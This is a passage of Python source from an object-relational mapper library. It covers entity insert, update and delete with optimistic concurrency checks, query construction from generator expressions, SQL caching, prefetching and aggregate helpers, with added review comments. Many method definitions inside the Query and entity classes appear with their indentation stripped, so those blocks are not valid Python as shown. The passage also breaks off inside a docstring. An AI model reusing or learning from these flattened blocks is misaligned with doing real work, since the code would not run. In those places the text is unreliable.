        if auto_pk:
            # Register the newly generated PK in the identity map.
            pk_attrs = obj._pk_attrs_
            cache_index = obj._session_cache_.indexes[pk_attrs]
            obj2 = cache_index.setdefault(new_id, obj)
            if obj2 is not obj: throw(TransactionIntegrityError,
                'Newly auto-generated id value %s was already used in transaction cache for another object' % new_id)
            obj._pkval_ = obj._vals_[pk_attrs[0]] = new_id
            obj._newid_ = None
        obj._status_ = 'inserted'
        obj._rbits_ = obj._all_bits_except_volatile_
        obj._wbits_ = 0
        obj._update_dbvals_(True, new_dbvals)
    def _save_updated_(obj):
        # Flush a 'modified' object: UPDATE only the columns whose write bits
        # are set, optionally guarded by an optimistic WHERE clause built
        # from the values read during this transaction.
        update_columns = []
        values = []
        new_dbvals = {}
        for attr in obj._attrs_with_bit_(obj._attrs_with_columns_, obj._wbits_):
            update_columns.extend(attr.columns)
            val = obj._vals_[attr]
            if not attr.reverse:
                assert len(attr.converters) == 1
                dbval = attr.converters[0].val2dbval(val, obj)
                new_dbvals[attr] = dbval
                values.append(dbval)
            else:
                new_dbvals[attr] = val
                values.extend(attr.get_raw_values(val))
        if update_columns:
            for attr in obj._pk_attrs_:
                val = obj._vals_[attr]
                values.extend(attr.get_raw_values(val))
            cache = obj._session_cache_
            optimistic_session = cache.db_session is None or cache.db_session.optimistic
            if optimistic_session and obj not in cache.for_update:
                optimistic_ops, optimistic_columns, optimistic_converters, optimistic_values = \
                    obj._construct_optimistic_criteria_()
                values.extend(optimistic_values)
            else: optimistic_columns = optimistic_converters = optimistic_ops = ()
            query_key = tuple(update_columns), tuple(optimistic_columns), tuple(optimistic_ops)
            database = obj._database_
            cached_sql = obj._update_sql_cache_.get(query_key)
            if cached_sql is None:
                update_converters = []
                for attr in obj._attrs_with_bit_(obj._attrs_with_columns_, obj._wbits_):
                    update_converters.extend(attr.converters)
                assert len(update_columns) == len(update_converters)
                update_params = [ [ 'PARAM', (i, None, None), converter ] for i, converter in enumerate(update_converters) ]
                params_count = len(update_params)
                where_list = [ 'WHERE' ]
                pk_columns = obj._pk_columns_
                pk_converters = obj._pk_converters_
                params_count = populate_criteria_list(where_list, pk_columns, pk_converters, repeat('EQ'), params_count)
                if optimistic_columns: populate_criteria_list(
                    where_list, optimistic_columns, optimistic_converters, optimistic_ops, params_count, optimistic=True)
                sql_ast = [ 'UPDATE', obj._table_, list(izip(update_columns, update_params)), where_list ]
                sql, adapter = database._ast2sql(sql_ast)
                obj._update_sql_cache_[query_key] = sql, adapter
            else: sql, adapter = cached_sql
            arguments = adapter(values)
            cursor = database._exec_sql(sql, arguments, start_transaction=True)
            # NOTE(review): when cache.db_session is None the line below would
            # raise AttributeError instead of OptimisticCheckError — confirm
            # whether db_session can be None here.
            if cursor.rowcount == 0 and cache.db_session.optimistic:
                throw(OptimisticCheckError, obj.find_updated_attributes())
        obj._status_ = 'updated'
        obj._rbits_ |= obj._wbits_ & obj._all_bits_except_volatile_
        obj._wbits_ = 0
        obj._update_dbvals_(False, new_dbvals)
    def _save_deleted_(obj):
        # Flush a 'marked_to_delete' object: DELETE by PK, optionally guarded
        # by an optimistic WHERE clause, then drop it from the identity map.
        values = []
        values.extend(obj._get_raw_pkval_())
        cache = obj._session_cache_
        optimistic_session = cache.db_session is None or cache.db_session.optimistic
        if optimistic_session and obj not in cache.for_update:
            optimistic_ops, optimistic_columns, optimistic_converters, optimistic_values = \
                obj._construct_optimistic_criteria_()
            values.extend(optimistic_values)
        else: optimistic_columns = optimistic_converters = optimistic_ops = ()
        query_key = tuple(optimistic_columns), tuple(optimistic_ops)
        database = obj._database_
        cached_sql = obj._delete_sql_cache_.get(query_key)
        if cached_sql is None:
            where_list = [ 'WHERE' ]
            params_count = populate_criteria_list(where_list, obj._pk_columns_, obj._pk_converters_, repeat('EQ'))
            if optimistic_columns: populate_criteria_list(
                where_list, optimistic_columns, optimistic_converters, optimistic_ops, params_count, optimistic=True)
            from_ast = [ 'FROM', [ None, 'TABLE', obj._table_ ] ]
            sql_ast = [ 'DELETE', None, from_ast, where_list ]
            sql, adapter = database._ast2sql(sql_ast)
            obj.__class__._delete_sql_cache_[query_key] = sql, adapter
        else: sql, adapter = cached_sql
        arguments = adapter(values)
        cursor = database._exec_sql(sql, arguments, start_transaction=True)
        # NOTE(review): when cache.db_session is None the line below would
        # raise AttributeError instead of OptimisticCheckError — confirm.
        if cursor.rowcount == 0 and cache.db_session.optimistic:
            throw(OptimisticCheckError, obj.find_updated_attributes())
        obj._status_ = 'deleted'
        cache.indexes[obj._pk_attrs_].pop(obj._pkval_)
    def find_updated_attributes(obj):
        # After a failed optimistic check, re-SELECT the row and produce a
        # human-readable message describing what changed (or that the row
        # was deleted) outside of the current transaction.
        entity = obj.__class__
        attrs_to_select = []
        attrs_to_select.extend(entity._pk_attrs_)
        discr = entity._discriminator_attr_
        if discr is not None and discr.pk_offset is None:
            attrs_to_select.append(discr)
        for attr in obj._attrs_with_bit_(obj._attrs_with_columns_, obj._rbits_):
            optimistic = attr.optimistic if attr.optimistic is not None else attr.converters[0].optimistic
            if optimistic:
                attrs_to_select.append(attr)
        optimistic_converters = []
        attr_offsets = {}
        select_list = [ 'ALL' ]
        for attr in attrs_to_select:
            optimistic_converters.extend(attr.converters)
            attr_offsets[attr] = offsets = []
            for columns in attr.columns:
                select_list.append([ 'COLUMN', None, columns])
                offsets.append(len(select_list) - 2)
        from_list = [ 'FROM', [ None, 'TABLE', entity._table_ ] ]
        pk_columns = entity._pk_columns_
        pk_converters = entity._pk_converters_
        criteria_list = [ [ converter.EQ, [ 'COLUMN', None, column ], [ 'PARAM', (i, None, None), converter ] ]
                          for i, (column, converter) in enumerate(izip(pk_columns, pk_converters)) ]
        sql_ast = [ 'SELECT', select_list, from_list, [ 'WHERE' ] + criteria_list ]
        database = entity._database_
        sql, adapter = database._ast2sql(sql_ast)
        arguments = adapter(obj._get_raw_pkval_())
        cursor = database._exec_sql(sql, arguments)
        row = cursor.fetchone()
        if row is None:
            return "Object %s was deleted outside of current transaction" % safe_repr(obj)
        real_entity_subclass, pkval, avdict = entity._parse_row_(row, attr_offsets)
        diff = []
        for attr, new_dbval in avdict.items():
            old_dbval = obj._dbvals_[attr]
            converter = attr.converters[0]
            if old_dbval != new_dbval and (
                    attr.reverse or not converter.dbvals_equal(old_dbval, new_dbval)):
                diff.append('%s (%r -> %r)' % (attr.name, old_dbval, new_dbval))
        return "Object %s was updated outside of current transaction%s" % (
            safe_repr(obj), ('. Changes: %s' % ', '.join(diff) if diff else ''))
    def _save_(obj, dependent_objects=None):
        # Flush this object's pending change (INSERT/UPDATE/DELETE), then
        # remove it from objects_to_save — leaving a None "hole" unless it is
        # the last element, so other queued objects keep their positions.
        status = obj._status_
        if status in ('created', 'modified'):
            # Referenced new objects must be inserted first (FK targets).
            obj._save_principal_objects_(dependent_objects)
        if status == 'created': obj._save_created_()
        elif status == 'modified': obj._save_updated_()
        elif status == 'marked_to_delete': obj._save_deleted_()
        else: assert False, "_save_() called for object %r with incorrect status %s" % (obj, status) # pragma: no cover
        assert obj._status_ in saved_statuses
        cache = obj._session_cache_
        assert cache is not None and cache.is_alive
        cache.saved_objects.append((obj, obj._status_))
        objects_to_save = cache.objects_to_save
        save_pos = obj._save_pos_
        if save_pos == len(objects_to_save) - 1:
            objects_to_save.pop()
        else:
            objects_to_save[save_pos] = None
        obj._save_pos_ = None
    def flush(obj):
        # Save only this object's pending change (principal objects included),
        # running the before_*/after_* hooks around the save.
        if obj._status_ not in ('created', 'modified', 'marked_to_delete'):
            return
        assert obj._save_pos_ is not None, 'save_pos is None for %s object' % obj._status_
        cache = obj._session_cache_
        assert cache is not None and cache.is_alive and not cache.saved_objects
        with cache.flush_disabled():
            obj._before_save_() # should be inside flush_disabled to prevent infinite recursion
            # TODO: add to documentation that flush is disabled inside before_xxx hooks
            obj._save_()
        cache.call_after_save_hooks()
def _before_save_(obj):
status = obj._status_
if status == 'created': obj.before_insert()
elif status == 'modified': obj.before_update()
elif status == 'marked_to_delete': obj.before_delete()
def before_insert(obj):
pass
def before_update(obj):
pass
def before_delete(obj):
pass
def _after_save_(obj, status):
if status == 'inserted': obj.after_insert()
elif status == 'updated': obj.after_update()
elif status == 'deleted': obj.after_delete()
def after_insert(obj):
pass
def after_update(obj):
pass
def after_delete(obj):
pass
    @cut_traceback
    def to_dict(obj, only=None, exclude=None, with_collections=False, with_lazy=False, related_objects=False):
        """Return the object's attribute values as a plain dict.

        only/exclude restrict the attribute set; with_collections/with_lazy
        include collection and lazy attributes.  Related objects are reduced
        to their primary-key values unless related_objects=True.
        """
        cache = obj._session_cache_
        # flush pending changes so the snapshot reflects the current state
        if cache is not None and cache.is_alive and cache.modified: cache.flush()
        attrs = obj.__class__._get_attrs_(only, exclude, with_collections, with_lazy)
        result = {}
        for attr in attrs:
            value = attr.__get__(obj)
            if attr.is_collection:
                if related_objects: value = sorted(value)
                # composite PK: each item becomes a tuple of raw pk values
                elif len(attr.reverse.entity._pk_columns_) > 1:
                    value = sorted(item._get_raw_pkval_() for item in value)
                else: value = sorted(item._get_raw_pkval_()[0] for item in value)
            elif attr.is_relation and not related_objects and value is not None:
                value = value._get_raw_pkval_()
                if len(value) == 1: value = value[0]
            result[attr.name] = value
        return result
def to_json(obj, include=(), exclude=(), converter=None, with_schema=True, schema_hash=None):
return obj._database_.to_json(obj, include, exclude, converter, with_schema, schema_hash)
def string2ast(s):
    """Parse the text of a lambda/generator expression into its AST node.

    Results are memoized in string2ast_cache keyed by the source text.
    """
    result = string2ast_cache.get(s)
    if result is not None: return result
    if PY2:
        # Python 2 compiler module cannot handle non-ascii bytestrings
        if isinstance(s, str):
            try: s.encode('ascii')
            except UnicodeDecodeError: throw(TypeError,
                'The bytestring %r contains non-ascii symbols. Try to pass unicode string instead' % s)
        else: s = s.encode('ascii', 'backslashreplace')
    # parenthesize so a bare generator expression forms a valid statement
    module_node = parse('(%s)' % s)
    if not isinstance(module_node, ast.Module): throw(TypeError)
    stmt_node = module_node.node
    if not isinstance(stmt_node, ast.Stmt) or len(stmt_node.nodes) != 1: throw(TypeError)
    discard_node = stmt_node.nodes[0]
    if not isinstance(discard_node, ast.Discard): throw(TypeError)
    result = string2ast_cache[s] = discard_node.expr
    # result = deepcopy(result) # no need for now, but may be needed later
    return result
def get_globals_and_locals(args, kwargs, frame_depth, from_generator=False):
    """Split positional args of a query-building function into (func, globals, locals).

    args[0] must be a lambda/generator (or its text source); optional args[1]
    and args[2] are explicit globals/locals dictionaries.  When absent, the
    namespaces are captured from the caller's frame (frame_depth levels up)
    and, for a generator, merged with the generator's own frame locals.
    Raises TypeError on any misuse.
    """
    args_len = len(args)
    assert args_len > 0
    func = args[0]
    if from_generator:
        if not isinstance(func, (basestring, types.GeneratorType)): throw(TypeError,
            'The first positional argument must be generator expression or its text source. Got: %r' % func)
    else:
        if not isinstance(func, (basestring, types.FunctionType)): throw(TypeError,
            'The first positional argument must be lambda function or its text source. Got: %r' % func)
    if args_len > 1:
        globals = args[1]
        if not hasattr(globals, 'keys'): throw(TypeError,
            'The second positional arguments should be globals dictionary. Got: %r' % globals)
        if args_len > 2:
            locals = args[2]
            # bugfix: this previously tested the undefined name `local`, raising
            # NameError whenever an explicit locals dictionary was supplied
            if locals is not None and not hasattr(locals, 'keys'): throw(TypeError,
                'The third positional arguments should be locals dictionary. Got: %r' % locals)
        else: locals = {}
        if type(func) is types.GeneratorType:
            # the generator's own frame locals take precedence over explicit ones
            locals = locals.copy()
            locals.update(func.gi_frame.f_locals)
        if len(args) > 3: throw(TypeError, 'Excess positional argument%s: %s'
            % (len(args) > 4 and 's' or '', ', '.join(imap(repr, args[3:]))))
    else:
        locals = {}
        if frame_depth is not None:
            locals.update(sys._getframe(frame_depth+1).f_locals)
        if type(func) is types.GeneratorType:
            globals = func.gi_frame.f_globals
            locals.update(func.gi_frame.f_locals)
        elif frame_depth is not None:
            globals = sys._getframe(frame_depth+1).f_globals
    if kwargs: throw(TypeError, 'Keyword arguments cannot be specified together with positional arguments')
    return func, globals, locals
def make_query(args, frame_depth, left_join=False):
    """Create a Query from a generator object or its text source.

    A generator is decompiled back into an AST; a string is parsed.
    frame_depth locates the caller's namespaces for variable extraction.
    """
    gen, globals, locals = get_globals_and_locals(
        args, kwargs=None, frame_depth=frame_depth+1 if frame_depth is not None else None, from_generator=True)
    if isinstance(gen, types.GeneratorType):
        tree, external_names, cells = decompile(gen)
        # the code object identity keys the translator cache
        code_key = id(gen.gi_frame.f_code)
    elif isinstance(gen, basestring):
        tree = string2ast(gen)
        if not isinstance(tree, ast.GenExpr): throw(TypeError,
            'Source code should represent generator. Got: %s' % gen)
        code_key = gen
        cells = None
    else: assert False
    return Query(code_key, tree.code, globals, locals, cells, left_join)
@cut_traceback
def select(*args):
    """Build a Query from a generator expression (or its text source)."""
    return make_query(args, frame_depth=cut_traceback_depth + 1)
@cut_traceback
def left_join(*args):
    """Build a Query that joins related entities with LEFT JOIN semantics."""
    return make_query(args, frame_depth=cut_traceback_depth + 1, left_join=True)
@cut_traceback
def get(*args):
    """Build a query and return its single matching object (or None)."""
    query = make_query(args, frame_depth=cut_traceback_depth + 1)
    return query.get()
@cut_traceback
def exists(*args):
    """Build a query and report whether it yields at least one row."""
    query = make_query(args, frame_depth=cut_traceback_depth + 1)
    return query.exists()
@cut_traceback
def delete(*args):
    """Build a query and delete every object it selects."""
    query = make_query(args, frame_depth=cut_traceback_depth + 1)
    return query.delete()
def make_aggrfunc(std_func):
    """Wrap std_func so that, applied to a generator over an entity, it turns
    into the corresponding SQL aggregate query; otherwise it behaves exactly
    like the plain Python function."""
    def aggrfunc(*args, **kwargs):
        if not args:
            return std_func(**kwargs)
        arg = args[0]
        if type(arg) is types.GeneratorType:
            # '.0' is the generator's implicit first iterator in its frame locals;
            # best-effort: any failure falls back to the plain Python function
            try: iterator = arg.gi_frame.f_locals['.0']
            except: return std_func(*args, **kwargs)
            if isinstance(iterator, EntityIter):
                return getattr(select(arg), std_func.__name__)(*args[1:], **kwargs)
        return std_func(*args, **kwargs)
    aggrfunc.__name__ = std_func.__name__
    return aggrfunc
# Module-level aggregate helpers: each behaves like the wrapped builtin/utility
# function, but transparently becomes a SQL aggregate when applied to a
# generator iterating over an entity (see make_aggrfunc above).
count = make_aggrfunc(utils.count)
sum = make_aggrfunc(builtins.sum)
min = make_aggrfunc(builtins.min)
max = make_aggrfunc(builtins.max)
avg = make_aggrfunc(utils.avg)
group_concat = make_aggrfunc(utils.group_concat)
distinct = make_aggrfunc(utils.distinct)
def JOIN(expr):
    """Marker used inside query bodies to force JOIN semantics during
    translation; at runtime it is the identity function."""
    return expr
def desc(expr):
    """Mark an ordering expression as descending.

    Attributes map to their .desc wrapper, already-wrapped values unwrap,
    1-based column numbers negate, and strings become 'desc(...)' text;
    anything else passes through unchanged.
    """
    dispatch = (
        (Attribute, lambda e: e.desc),
        (DescWrapper, lambda e: e.attr),
        (int_types, lambda e: -e),
        (basestring, lambda e: 'desc(%s)' % e),
    )
    for classes, transform in dispatch:
        if isinstance(expr, classes):
            return transform(expr)
    return expr
def raw_sql(sql, result_type=None):
    """Wrap a raw SQL fragment for use inside a query.

    The caller's namespaces are captured via sys._getframe(1), so this
    function must be invoked directly from user code (not through a wrapper).
    """
    globals = sys._getframe(1).f_globals
    locals = sys._getframe(1).f_locals
    return RawSQL(sql, globals, locals, result_type)
def extract_vars(code_key, filter_num, extractors, globals, locals, cells=None):
    """Evaluate every extractor against the caller's namespaces.

    Returns (vars, vartypes): the values and normalized types of all external
    subexpressions, keyed by (filter_num, src, code_key).  Generators become
    sub-queries; already-fetched query results are inlined as tuples.
    """
    if cells:
        # closure cells take precedence over the captured locals
        locals = locals.copy()
        for name, cell in cells.items():
            try:
                locals[name] = cell.cell_contents
            except ValueError:
                throw(NameError, 'Free variable `%s` referenced before assignment in enclosing scope' % name)
    vars = {}
    vartypes = HashableDict()
    for src, extractor in iteritems(extractors):
        varkey = filter_num, src, code_key
        try: value = extractor(globals, locals)
        except Exception as cause: raise ExprEvalError(src, cause)
        if isinstance(value, types.GeneratorType):
            value = make_query((value,), frame_depth=None)
        if isinstance(value, QueryResultIterator):
            qr = value._query_result
            value = qr if not qr._items else tuple(qr._items[value._position:])
        if isinstance(value, QueryResult) and value._items:
            value = tuple(value._items)
        if isinstance(value, (Query, QueryResult)):
            # absorb the sub-query's own variables and types
            query = value._query if isinstance(value, QueryResult) else value
            vars.update(query._vars)
            vartypes.update(query._translator.vartypes)
        # sanity checks: literal constants must still evaluate to themselves
        if src == 'None' and value is not None: throw(TranslationError)
        if src == 'True' and value is not True: throw(TranslationError)
        if src == 'False' and value is not False: throw(TranslationError)
        try: vartypes[varkey], value = normalize(value)
        except TypeError:
            if not isinstance(value, dict):
                unsupported = False
                try: value = tuple(value)
                except: unsupported = True
            else: unsupported = True
            if unsupported:
                typename = type(value).__name__
                if src == '.0':
                    throw(TypeError, 'Query cannot iterate over anything but entity class or another query')
                throw(TypeError, 'Expression `%s` has unsupported type %r' % (src, typename))
            # generic iterables were converted to tuples above; retry
            vartypes[varkey], value = normalize(value)
        vars[varkey] = value
    return vars, vartypes
def unpickle_query(query_result):
    """Unpickling helper: a pickled Query is restored as its QueryResult."""
    return query_result
class Query(object):
    """Translates a decompiled generator expression into SQL and executes it.

    A Query is immutable from the caller's point of view: every refining
    method returns a clone.  Translators and constructed SQL are cached on
    the database, keyed by the code object and the variable types.
    """
    def __init__(query, code_key, tree, globals, locals, cells=None, left_join=False):
        assert isinstance(tree, ast.GenExprInner)
        # replace external subexpressions with extractors, then evaluate them
        tree, extractors = create_extractors(code_key, tree, globals, locals, special_functions, const_functions)
        filter_num = 0
        vars, vartypes = extract_vars(code_key, filter_num, extractors, globals, locals, cells)
        node = tree.quals[0].iter
        varkey = filter_num, node.src, code_key
        origin = vars[varkey]
        if isinstance(origin, Query):
            prev_query = origin
        elif isinstance(origin, QueryResult):
            prev_query = origin._query
        elif isinstance(origin, QueryResultIterator):
            prev_query = origin._query_result._query
        else:
            prev_query = None
        if prev_query is not None:
            # query over another query: reuse its database and continue its filter chain
            database = prev_query._translator.database
            filter_num = prev_query._filter_num + 1
            vars, vartypes = extract_vars(code_key, filter_num, extractors, globals, locals, cells)
        else:
            # bugfix: this entity validation previously ran unconditionally, so a
            # query iterating over another query hit the non-entity TypeError and
            # `origin._database_` (entities only) — it must be skipped when a
            # prev_query was recognized above
            if not isinstance(origin, EntityMeta):
                if node.src == '.0': throw(TypeError,
                    'Query can only iterate over entity or another query (not a list of objects)')
                throw(TypeError, 'Cannot iterate over non-entity object %s' % node.src)
            database = origin._database_
            if database is None: throw(TranslationError, 'Entity %s is not mapped to a database' % origin.__name__)
            if database.schema is None: throw(ERDiagramError, 'Mapping is not generated for entity %r' % origin.__name__)
        query._filter_num = filter_num
        database.provider.normalize_vars(vars, vartypes)
        query._code_key = code_key
        query._key = HashableDict(code_key=code_key, vartypes=vartypes, left_join=left_join, filters=())
        query._database = database
        translator, vars = query._get_translator(query._key, vars)
        query._vars = vars
        if translator is None:
            pickled_tree = pickle_ast(tree)
            tree_copy = unpickle_ast(pickled_tree)  # tree = deepcopy(tree)
            translator_cls = database.provider.translator_cls
            try:
                translator = translator_cls(tree_copy, None, code_key, filter_num, extractors, vars, vartypes.copy(), left_join=left_join)
            except UseAnotherTranslator as e:
                translator = e.translator
            name_path = translator.can_be_optimized()
            if name_path:
                # retry translation with a LEFT JOIN optimization over name_path
                tree_copy = unpickle_ast(pickled_tree)  # tree = deepcopy(tree)
                try:
                    translator = translator_cls(tree_copy, None, code_key, filter_num, extractors, vars, vartypes.copy(),
                                                left_join=True, optimize=name_path)
                except UseAnotherTranslator as e:
                    translator = e.translator
                except OptimizationFailed:
                    translator.optimization_failed = True
            translator.pickled_tree = pickled_tree
            if translator.can_be_cached:
                database._translator_cache[query._key] = translator
        query._translator = translator
        query._filters = ()
        query._next_kwarg_id = 0
        query._for_update = query._nowait = False
        query._distinct = None
        query._prefetch = False
        query._entities_to_prefetch = set()
        query._attrs_to_prefetch_dict = defaultdict(set)
def _get_type_(query):
return QueryType(query)
def _normalize_var(query, query_type):
return query_type, query
def _clone(query, **kwargs):
new_query = object.__new__(Query)
new_query.__dict__.update(query.__dict__)
new_query.__dict__.update(kwargs)
return new_query
def __reduce__(query):
return unpickle_query, (query._fetch(),)
    def _get_translator(query, query_key, vars):
        """Look up a cached translator for query_key.

        Returns (translator, vars), where vars may be extended with externals
        of functions called inside the query.  Returns (None, vars) when no
        cached translator is applicable and a fresh one must be built.
        """
        new_vars = vars.copy()
        database = query._database
        translator = database._translator_cache.get(query_key)
        all_func_vartypes = {}
        if translator is not None:
            if translator.func_extractors_map:
                # re-extract externals of functions used inside the query body
                for func, func_extractors in iteritems(translator.func_extractors_map):
                    func_id = id(func.func_code if PY2 else func.__code__)
                    func_filter_num = translator.filter_num, 'func', func_id
                    func_vars, func_vartypes = extract_vars(
                        func_id, func_filter_num, func_extractors, func.__globals__, {}, func.__closure__) # todo closures
                    database.provider.normalize_vars(func_vars, func_vartypes)
                    new_vars.update(func_vars)
                    all_func_vartypes.update(func_vartypes)
                if all_func_vartypes != translator.func_vartypes:
                    # function external types changed: cached translator unusable
                    return None, vars.copy()
            for key, attrname in iteritems(translator.getattr_values):
                assert key in new_vars
                if attrname != new_vars[key]:
                    # a getattr() name changed: drop the stale cache entry
                    del database._translator_cache[query_key]
                    return None, vars.copy()
        return translator, new_vars
    def _construct_sql_and_arguments(query, limit=None, offset=None, range=None, aggr_func_name=None, aggr_func_distinct=None, sep=None):
        """Build (or fetch from the per-database cache) the SQL text, adapter
        arguments, attribute offsets, and the key under which the query result
        itself may be cached (None when the result is not cacheable)."""
        translator = query._translator
        expr_type = translator.expr_type
        if isinstance(expr_type, EntityMeta) and query._attrs_to_prefetch_dict:
            attrs_to_prefetch = tuple(sorted(query._attrs_to_prefetch_dict.get(expr_type, ())))
        else:
            attrs_to_prefetch = ()
        sql_key = HashableDict(
            query._key,
            vartypes=HashableDict(query._translator.vartypes),
            getattr_values=HashableDict(translator.getattr_values),
            limit=limit,
            offset=offset,
            distinct=query._distinct,
            aggr_func=(aggr_func_name, aggr_func_distinct, sep),
            for_update=query._for_update,
            nowait=query._nowait,
            inner_join_syntax=options.INNER_JOIN_SYNTAX,
            attrs_to_prefetch=attrs_to_prefetch
        )
        database = query._database
        cache_entry = database._constructed_sql_cache.get(sql_key)
        if cache_entry is None:
            sql_ast, attr_offsets = translator.construct_sql_ast(
                limit, offset, query._distinct, aggr_func_name, aggr_func_distinct, sep,
                query._for_update, query._nowait, attrs_to_prefetch)
            # NOTE(review): `cache` appears unused here; _get_cache() may be kept
            # for a side effect of establishing the session cache — confirm
            cache = database._get_cache()
            sql, adapter = database.provider.ast2sql(sql_ast)
            cache_entry = sql, adapter, attr_offsets
            database._constructed_sql_cache[sql_key] = cache_entry
        else: sql, adapter, attr_offsets = cache_entry
        arguments = adapter(query._vars)
        if query._translator.query_result_is_cacheable:
            # results can only be memoized when the arguments are hashable
            arguments_key = HashableDict(arguments) if type(arguments) is dict else arguments
            try: hash(arguments_key)
            except: query_key = None # arguments are unhashable
            else: query_key = HashableDict(sql_key, arguments_key=arguments_key)
        else: query_key = None
        return sql, arguments, attr_offsets, query_key
def get_sql(query):
sql, arguments, attr_offsets, query_key = query._construct_sql_and_arguments()
return sql
def _actual_fetch(query, limit=None, offset=None):
translator = query._translator
sql, arguments, attr_offsets, query_key = query._construct_sql_and_arguments(limit, offset)
database = query._database
cache = database._get_cache()
if query._for_update: cache.immediate = True
cache.prepare_connection_for_query_execution() # may clear cache.query_results
items = cache.query_results.get(query_key)
if items is None:
cursor = database._exec_sql(sql, arguments)
if isinstance(translator.expr_type, EntityMeta):
entity = translator.expr_type
items = entity._fetch_objects(cursor, attr_offsets, for_update=query._for_update,
used_attrs=translator.get_used_attrs())
elif len(translator.row_layout) == 1:
func, slice_or_offset, src = translator.row_layout[0]
items = list(starmap(func, cursor.fetchall()))
else:
items = [ tuple(func(sql_row[slice_or_offset])
for func, slice_or_offset, src in translator.row_layout)
for sql_row in cursor.fetchall() ]
for i, t in enumerate(translator.expr_type):
if isinstance(t, EntityMeta) and t._subclasses_: t._load_many_(row[i] for row in items)
if query_key is not None: cache.query_results[query_key] = items
else:
stats = database._dblocal.stats
stat = stats.get(sql)
if stat is not None: stat.cache_count += 1
else: stats[sql] = QueryStat(sql)
if query._prefetch: query._do_prefetch(items)
return items
    @cut_traceback
    def prefetch(query, *args):
        """Return a clone that, after fetching, also loads the given entities
        and/or attributes (relations, collections, lazy columns) eagerly."""
        query = query._clone(_entities_to_prefetch=query._entities_to_prefetch.copy(),
                             _attrs_to_prefetch_dict=query._attrs_to_prefetch_dict.copy())
        query._prefetch = True
        for arg in args:
            if isinstance(arg, EntityMeta):
                entity = arg
                if query._database is not entity._database_: throw(TypeError,
                    'Entity %s belongs to different database and cannot be prefetched' % entity.__name__)
                query._entities_to_prefetch.add(entity)
            elif isinstance(arg, Attribute):
                attr = arg
                entity = attr.entity
                if query._database is not entity._database_: throw(TypeError,
                    'Entity of attribute %s belongs to different database and cannot be prefetched' % attr)
                # plain column attrs are loaded anyway; only relations & lazy attrs matter
                if isinstance(attr.py_type, EntityMeta) or attr.lazy:
                    query._attrs_to_prefetch_dict[entity].add(attr)
            else: throw(TypeError, 'Argument of prefetch() query method must be entity class or attribute. '
                                   'Got: %r' % arg)
        return query
    def _do_prefetch(query, result):
        """Eagerly load all requested related objects and attributes for the
        fetched result, walking newly reached objects breadth-first."""
        expr_type = query._translator.expr_type
        object_list = []
        object_set = set()
        append_to_object_list = object_list.append
        add_to_object_set = object_set.add
        # collect distinct entity instances from the result, preserving order
        if isinstance(expr_type, EntityMeta):
            for obj in result:
                if obj not in object_set:
                    add_to_object_set(obj)
                    append_to_object_list(obj)
        elif type(expr_type) is tuple:
            for i, t in enumerate(expr_type):
                if not isinstance(t, EntityMeta): continue
                for row in result:
                    obj = row[i]
                    if obj not in object_set:
                        add_to_object_set(obj)
                        append_to_object_list(obj)
        cache = query._database._get_cache()
        entities_to_prefetch = query._entities_to_prefetch
        attrs_to_prefetch_dict = query._attrs_to_prefetch_dict
        prefetching_attrs_cache = {}
        # object_list grows while iterating: newly reached objects are processed too
        for obj in object_list:
            entity = obj.__class__
            if obj in cache.seeds[entity._pk_attrs_]: obj._load_()
            all_attrs_to_prefetch = prefetching_attrs_cache.get(entity)
            if all_attrs_to_prefetch is None:
                # compute once per entity which attributes need prefetching
                all_attrs_to_prefetch = []
                append = all_attrs_to_prefetch.append
                attrs_to_prefetch = attrs_to_prefetch_dict[entity]
                for attr in obj._attrs_:
                    if attr.is_collection:
                        if attr in attrs_to_prefetch: append(attr)
                    elif attr.is_relation:
                        if attr in attrs_to_prefetch or attr.py_type in entities_to_prefetch: append(attr)
                    elif attr.lazy:
                        if attr in attrs_to_prefetch: append(attr)
                prefetching_attrs_cache[entity] = all_attrs_to_prefetch
            for attr in all_attrs_to_prefetch:
                if attr.is_collection:
                    if not isinstance(attr, Set): throw(NotImplementedError)
                    setdata = obj._vals_.get(attr)
                    if setdata is None or not setdata.is_fully_loaded: setdata = attr.load(obj)
                    for obj2 in setdata:
                        if obj2 not in object_set:
                            add_to_object_set(obj2)
                            append_to_object_list(obj2)
                elif attr.is_relation:
                    obj2 = attr.get(obj)
                    if obj2 is not None and obj2 not in object_set:
                        add_to_object_set(obj2)
                        append_to_object_list(obj2)
                elif attr.lazy: attr.get(obj)
                else: assert False # pragma: no cover
@cut_traceback
def show(query, width=None):
query._fetch().show(width)
@cut_traceback
def get(query):
objects = query[:2]
if not objects: return None
if len(objects) > 1: throw(MultipleObjectsFoundError,
'Multiple objects were found. Use select(...) to retrieve them')
return objects[0]
    @cut_traceback
    def first(query):
        """Return the first result item (adding a deterministic ORDER BY when
        the query has none), or None when the result is empty."""
        translator = query._translator
        if translator.order: pass
        elif type(translator.expr_type) is tuple:
            # order by every column of the row to make "first" deterministic
            query = query.order_by(*[i+1 for i in xrange(len(query._translator.expr_type))])
        else:
            query = query.order_by(1)
        objects = query.without_distinct()[:1]
        if not objects: return None
        return objects[0]
@cut_traceback
def without_distinct(query):
return query._clone(_distinct=False)
@cut_traceback
def distinct(query):
return query._clone(_distinct=True)
@cut_traceback
def exists(query):
objects = query[:1]
return bool(objects)
    @cut_traceback
    def delete(query, bulk=None):
        """Delete the objects selected by the query.

        With bulk falsy (default) each object is fetched and deleted
        individually so hooks and cascades run; with bulk=True a single
        DELETE statement is issued and its rowcount returned.
        """
        if not bulk:
            if not isinstance(query._translator.expr_type, EntityMeta): throw(TypeError,
                'Delete query should be applied to a single entity. Got: %s'
                % ast2src(query._translator.tree.expr))
            objects = query._actual_fetch()
            for obj in objects: obj._delete_()
            return len(objects)
        translator = query._translator
        sql_key = HashableDict(query._key, sql_command='DELETE')
        database = query._database
        cache = database._get_cache()
        cache_entry = database._constructed_sql_cache.get(sql_key)
        if cache_entry is None:
            sql_ast = translator.construct_delete_sql_ast()
            cache_entry = database.provider.ast2sql(sql_ast)
            database._constructed_sql_cache[sql_key] = cache_entry
        sql, adapter = cache_entry
        arguments = adapter(query._vars)
        cache.immediate = True
        cache.prepare_connection_for_query_execution() # may clear cache.query_results
        cursor = database._exec_sql(sql, arguments)
        return cursor.rowcount
@cut_traceback
def __len__(query):
return len(query._actual_fetch())
@cut_traceback
def __iter__(query):
return iter(query._fetch(lazy=True))
@cut_traceback
def order_by(query, *args):
return query._order_by('order_by', *args)
@cut_traceback
def sort_by(query, *args):
return query._order_by('sort_by', *args)
    def _order_by(query, method_name, *args):
        """Shared implementation of order_by()/sort_by().

